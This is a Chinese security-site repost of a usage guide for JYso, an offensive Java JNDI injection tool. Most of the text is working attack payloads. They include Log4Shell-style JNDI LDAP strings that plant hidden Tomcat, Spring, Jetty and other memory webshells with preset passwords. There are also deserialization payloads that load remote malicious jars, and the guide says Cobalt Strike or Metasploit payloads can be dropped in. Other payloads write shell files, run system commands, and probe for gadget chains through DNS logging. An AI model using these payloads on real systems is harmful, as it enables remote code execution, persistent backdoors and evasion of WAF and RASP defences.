JYso可以同时具备多种JNDI高版本、WAF、RASP的Bypass功能工具

admin 2024年11月8日11:16:08评论12 views字数 5777阅读19分15秒阅读模式

下载

https://github.com/qi4L/JYso

使用说明

所有使用示例,用的是Yakit的FUZZ语法

JYso可以同时具备多种JNDI高版本、WAF、RASP的Bypass功能工具

🦄内存马

两种添加方式:

  • 支持引用远程类加载方式打入(Basic路由)。
  • 支持本地工厂类加载方式打入(TomcatBypass路由)。

使用说明:不指定类型就默认为冰蝎马。

  • t 选择内存马的类型
    • 不指定类型就默认为冰蝎马
    • bx: 冰蝎内存马,key: nu1ryydsReferer:https://nu1r.cn/
    • gz: 哥斯拉内存马,pass: nu1rReferer:https://nu1r.cn/
    • gzraw: 哥斯拉 raw 类型的内存马, pass: nu1rReferer:https://nu1r.cn/
    • cmd: cmd命令回显内存马。
  • a:是否继承恶意类 AbstractTranslet
  • o:使用反射绕过
  • w:Windows下使用Agent写入
  • l:Linux下使用Agent写入
  • u:内存马绑定的路径,default [/version.txt]
  • pw:内存马的密码,default [p@ssw0rd]
  • r:内存马 Referer check,default [https://nu1r.cn/]
  • h:通过将文件写入$JAVA_HOME来隐藏内存shell,目前只支持 SpringControllerMS
  • ht:隐藏内存外壳,输入1:write /jre/lib/charsets.jar 2:write /jre/classes/

示例

{{url
    (${jndi:ldap://111.229.10.212:1389/Basic/tomcatfilterjmx/shell/-u path223 -pw 123456 -r tth.cn})
}}

内存马说明:

  • SpringInterceptor: 向系统内植入 Spring Interceptor 类型的内存马
  • SpringController: 向系统内植入 Spring Controller 类型的内存马
  • JettyFilter: 利用 JMX MBeans 向系统内植入 Jetty Filter 型内存马
  • JettyServlet: 利用 JMX MBeans 向系统内植入 Jetty Servlet 型内存马
  • JBossFilter: 通过全局上下文向系统内植入 JBoss/Wildfly Filter 型内存马
  • JBossServlet: 通过全局上下文向系统内植入 JBoss/Wildfly Servlet 型内存马
  • resinFilterTh: 通过线程类加载器获取指定上下文系统内植入 Resin Filter 型内存马
  • resinServletTh: 通过线程类加载器获取指定上下文系统内植入 Resin Servlet 型内存马
  • WebsphereMemshell: 用于植入Websphere内存shell, 支持Behinder shell 与 Basic cmd shell
  • tomcatFilterJmx: 利用 JMX MBeans 向系统内植入 Tomcat Filter 型内存马
  • tomcatFilterTh: 通过线程类加载器获取指定上下文向系统内植入 Tomcat Filter 型内存马
  • TomcatListenerJmx: 利用 JMX MBeans 向系统内植入 Tomcat Listener 型内存马
  • TomcatListenerTh: 通过线程类加载器获取指定上下文向系统内植入 Tomcat Listener 型内存马
  • TomcatServletJmx: 利用 JMX MBeans 向系统内植入 Tomcat Servlet 型内存马
  • TomcatServletTh: 通过线程类加载器获取指定上下文向系统内植入 Tomcat Servlet 型内存马
  • WSFilterCMD 命令回显 WebSocket 内存马,cmd命令回显
  • TomcatExecutor : Executor 内存马,cmd命令回显
  • TomcatUpgrade: TomcatUpgrade 内存马,cmd命令回显
  • Struts2ActionMS: Action 类型内存马

👻 BeanShell1 与 Clojure 利用链的拓展

对于 BeanShell1 及 Clojure 这两个基于脚本语言解析的漏利用方式。

本项目为这两条利用链拓展了除了 Runtime 执行命令意外的多种利用方式,具体如下:

Base64/后的内容需要base64编码

TS :Thread Sleep - 通过 Thread.sleep() 的方式来检查是否存在反序列化漏洞,使用命令:TS-10

{{url
    (${jndi:ldap://0.0.0.0:1389/Deserialization/Clojure/nu1r/Base64/{{base64
        (TS-10)
    }}})
}}

RC :Remote Call - 通过 URLClassLoader.loadClass() 来调用远程恶意类并初始化,使用命令:RC-http://xxxx.com/evil.jar#EvilClass

换成CS或者MSF生成的JAR包,即可完成一键上线。

{{url
    (${jndi:ldap://0.0.0.0:1389/Deserialization/Clojure/nu1r/Base64/{{base64
        (RC-http://xxxx.com/evil.jar#EvilClass)
    }}})
}}

WF :Write File - 通过 FileOutputStream.write() 来写入文件,使用命令:WF-/tmp/shell#123

{{url
    (${jndi:ldap://0.0.0.0:1389/Deserialization/Clojure/nu1r/Base64/{{base64
        (WF-/tmp/shell#123)
    }}})
}}

其他:普通命令执行 - 通过 ProcessBuilder().start() 执行系统命令,使用命令 whoami

{{url
    (${jndi:ldap://0.0.0.0:1389/Deserialization/Clojure/nu1r/Base64/{{base64
        (whoami)
    }}})
}}

🐗C3P04的使用

  • 远程加载 Jar 包
    • C3P04 'remoteJar-http://1.1.1.1.com/1.jar'
  • 向服务器写入 Jar 包并加载(不出网)
    • C3P04 'writeJar-/tmp/evil.jar:./yaml.jar'
    • C3P04 'localJar-./yaml.jar'
  • C3P0 二次反序列化
    • C3P04 'c3p0Double-/usr/CC6.ser'
{{url
    (${jndi:ldap://0.0.0.0:1389/Deserialization/C3P04/nu1r/Base64/{{base64
        ([base64_encoded_cmd])
    }}})
}}

🐅SignedObject 二次反序列化 Gadget

用来进行某些场景的绕过(常见如 TemplatesImpl 黑名单,CTF 中常出现的 CC 无数组加黑名单等)

利用链需要调用 SignedObject 的 getObject 方法,因此需要可以调用任意方法、或调用指定类 getter 方法的触发点;

大概包含如下几种可用的常见调用链:

  1. InvokerTransformer 调用任意方法(依赖 CC)
  2. BeanComparator 调用 getter 方法(依赖 CB)
  3. BasicPropertyAccessor$BasicGetter 调用 getter 方法(依赖 Hibernate)
  4. ToStringBean 调用全部 getter 方法(依赖 Rome)
  5. MethodInvokeTypeProvider 反射调用任意方法(依赖 spring-core)
  6. MemberBox 反射调用任意方法(依赖 rhino)
  • cc,cc4,cb,hibernate,rome,rhino,spring

  • 利用方式:

  • SignedObjectPayload -> 'CC:CommonsCollections6:b3BlbiAtYSBDYWxjdWxhdG9yLmFwcA==:1:10000' 最后两个参数是反序列化的类型

{{url
    (${jndi:ldap://0.0.0.0:1389/Deserialization/SignedObject/nu1r/Base64/{{base64
        (CC:commonscollections6:{{base64
            (open -a Calculator.app)
        }}1::10000)
    }}})
}}

效果图:

JYso可以同时具备多种JNDI高版本、WAF、RASP的Bypass功能工具

🦜利用链探测

参考了 kezibei 师傅的 URLDNS 项目,实际情况可能有如下几种情况导致问题:

  • 反序列时遇到黑名单,可能导致后面的类的 dnslog 出不来;
  • 反序列化流程中由于种种情况报错可能导致出不来。

因此这里还是提供了 all/common/指定类 三种探测方式:

  • all:探测全部的类;
  • common:探测不常在黑名单中的 CommonsBeanutils2/C3P0/AspectJWeaver/bsh/winlinux;
  • 指定类:使用对应链中的关键字 CommonsCollections24:xxxx.dns.log 。
{{url
    (${jndi:ldap://0.0.0.0:1389/Deserialization/URLDNS/nu1r/Base64/{{base64
        (all:xxxxxx.dns.log)
    }}})
}}

效果图:

JYso可以同时具备多种JNDI高版本、WAF、RASP的Bypass功能工具

DNSLOG 关键字 对应链 关键类 备注
cc31or321
cc322
CommonsCollections13567 org.apache.commons.collections.functors.ChainedTransformer
org.apache.commons.collections.ExtendedProperties$1
CommonsCollections1/3/5/6/7
需要<=3.2.1版本
cc40
cc41
CommonsCollections24 org.apache.commons.collections4.functors.ChainedTransformer
org.apache.commons.collections4.FluentIterable
CommonsCollections2/4链
需要4-4.0版本
cb17
cb18x
cb19x
CommonsBeanutils2 org.apache.commons.beanutils.MappedPropertyDescriptor$1
org.apache.commons.beanutils.DynaBeanMapDecorator$MapEntry
org.apache.commons.beanutils.BeanIntrospectionData
1.7x-1.8x为-3490850999041592962
1.9x为-2044202215314119608
c3p092x
c3p095x
C3P0 com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase
com.mchange.v2.c3p0.test.AlwaysFailDataSource
0.9.2pre2-0.9.5pre8为7387108436934414104
0.9.5pre9-0.9.5.5为7387108436934414104
ajw AspectJWeaver org.aspectj.weaver.tools.cache.SimpleCache AspectJWeaver,需要cc31
bsh20b4
bsh20b5
bsh20b6
bsh bsh.CollectionManager$1
bsh.engine.BshScriptEngine
bsh.collection.CollectionIterator$1
2.0b4为4949939576606791809
2.0b5为4041428789013517368
2.0.b6无法反序列化
groovy1702311
groovy24x
groovy244
Groovy org.codehaus.groovy.reflection.ClassInfo$ClassInfoSet
groovy.lang.Tuple2
org.codehaus.groovy.runtime.dgm$1170
2.4.x为-8137949907733646644
2.3.x为1228988487386910280
becl Becl com.sun.org.apache.bcel.internal.util.ClassLoader JDK<8u251
Jdk7u21 Jdk7u21 com.sun.corba.se.impl.orbutil.ORBClassLoader JDK<=7u21
JRE8u20 JRE8u20 javax.swing.plaf.metal.MetalFileChooserUI$DirectoryComboBoxModel$1 7u25<=JDK<=8u20
这个检测不完美,8u25版本以及JDK<=7u21会误报
可综合Jdk7u21来看
linux
windows
winlinux sun.awt.X11.AwtGraphicsConfigData
sun.awt.windows.WButtonPeer
windows/linux版本判断
all 全部检测

🐳自定义

  • 自定义链子

在 com.nu1r.jndi.gadgets 下新建JAVA文件,并实现接口 ObjectPayload 后在 getObject 方法中编写链子逻辑即可。使用

{{url
    (${jndi:ldap://0.0.0.0:1389/Deserialization/自定义链子的类名/nu1r/Base64/{{base64
        (whoami)
    }}})
}}
  • 自定义内存马

在 com.nu1r.jndi.template 下新建 JAVA 文件并将主要实现方法写在静态代码块中。

额外方法与 shell 通过 javassist 引入 com.nu1r.jndi.template.shell.MemShellPayloads(最小化有效负载的大小)

使用与上面内存马使用一致

原文始发于微信公众号(TKing的安全圈):JYso可以同时具备多种JNDI高版本、WAF、RASP的Bypass功能工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月8日11:16:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   JYso可以同时具备多种JNDI高版本、WAF、RASP的Bypass功能工具https://cn-sec.com/archives/3372431.html

发表评论

匿名网友 填写信息